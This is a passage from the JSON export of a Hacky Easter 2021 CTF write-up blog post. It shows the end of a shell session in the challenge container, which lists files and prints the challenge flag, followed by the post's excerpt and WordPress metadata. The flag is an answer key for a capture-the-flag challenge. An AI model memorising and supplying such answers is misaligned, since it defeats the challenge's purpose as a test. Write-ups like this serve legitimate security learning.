\u250f\u2501\u251b\u251b\u250f\u2501\u251b\u250f\u2501 \u2501\u250f\u251b  \u250f\u250f \u250f\u2501\u2503\u250f\u2501\u2503\u251b\u250f\u2501 \u250f\u2501\u251b\u250f\u2501\u2503\r\n \u2503 \u250f\u2501\u2503\u250f\u2501\u251b  \u250f\u250f\u251b\u2503\u2503\u2503\u2503\u250f\u2501\u251b  \u2503 \u2503\u250f\u2501\u251b   \u2503 \u250f\u2501\u2503\u250f\u2501\u251b  \u250f\u2501\u2503\u2503 \u2503\u2503  \u2503\u250f\u2501\u251b\u2503 \u2503 \u2503   \u2503\u2503\u2503\u250f\u2501\u2503\u250f\u250f\u251b\u2503\u2503 \u2503\u250f\u2501\u251b\u250f\u250f\u251b\r\n \u251b \u251b \u251b\u2501\u2501\u251b  \u251b \u251b\u251b\u251b\u251b\u251b\u2501\u2501\u251b  \u2501\u2501\u251b\u251b     \u251b \u251b \u251b\u2501\u2501\u251b  \u251b \u251b\u251b \u251b\u2501\u2501\u251b\u251b\u2501\u2501\u251b\u251b \u251b \u251b   \u251b\u251b\u251b\u251b \u251b\u251b \u251b\u251b\u251b \u251b\u2501\u2501\u251b\u251b \u251b\r\n-------------------------------------------------------\r\n...\r\n\r\n$ id\r\nuid=1000(ctf) gid=1000(ctf) groups=1000(ctf)\r\n$ ls -al\r\ntotal 56\r\ndrwxr-xr-x 1 root root  4096 Mar  3 12:11 .\r\ndrwxr-xr-x 1 root root  4096 Mar  3 08:34 ..\r\n-rw-r--r-- 1 root root   220 Apr  4  2018 .bash_logout\r\n-rw-r--r-- 1 root root  3771 Apr  4  2018 .bashrc\r\n-rw-r--r-- 1 root root   807 Apr  4  2018 .profile\r\n-rwxrwxr-x 1 root root  7048 Mar  3 12:10 challenge3\r\n-rwxrwxr-x 1 root root    25 Mar  3 12:10 flag\r\n-rw-rw-r-- 1 root root   607 Mar  3 12:10 heading\r\n-rwxrwxr-x 1 root root 18744 Mar  3 12:10 ynetd\r\n$ cat flag\r\nhe2021{1nsp3ktorr_g4dg3t}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{1nsp3ktorr_g4dg3t}<\/span>.\r\n\r\n<\/p>\r\n","protected":false},"excerpt":{"rendered":"<p>HackyEaster was awesome again. From a technical point of view there weren&#8217;t too much new things, but the creativity of the provided challenges made it really fun. Including the little teaser challenge there were a total amount of 37 challenges. These challenges were divided into different levels. You could only proceed to the next level, &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/devel0pment.de\/?p=2282\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;Hacky Easter 2021 writeup&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[25,7],"tags":[8,9,23,13,44,18,16,21,10,38,11,12,28,19,14],"class_list":["post-2282","post","type-post","status-publish","format-standard","hentry","category-hacking-lab-com","category-writeup","tag-assembly","tag-binary","tag-crypto","tag-elf","tag-exploitation","tag-gdb","tag-hacking-lab","tag-hackyeaster","tag-pwn","tag-python","tag-r2","tag-reversing","tag-web","tag-x64","tag-x86"],"_links":{"self":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/2282"}],"collection":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2282"}],"version-history":[{"count":27,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/2282\/revisions"}],"predecessor-version":[{"id":2419,"href":"https:\/\/devel0pment.de\/index.php?rest_route=\/wp\/v2\/posts\/2282\/revisions\/2419"}],"wp:attachment":[{"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2282"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2282"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devel0pment.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2282"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}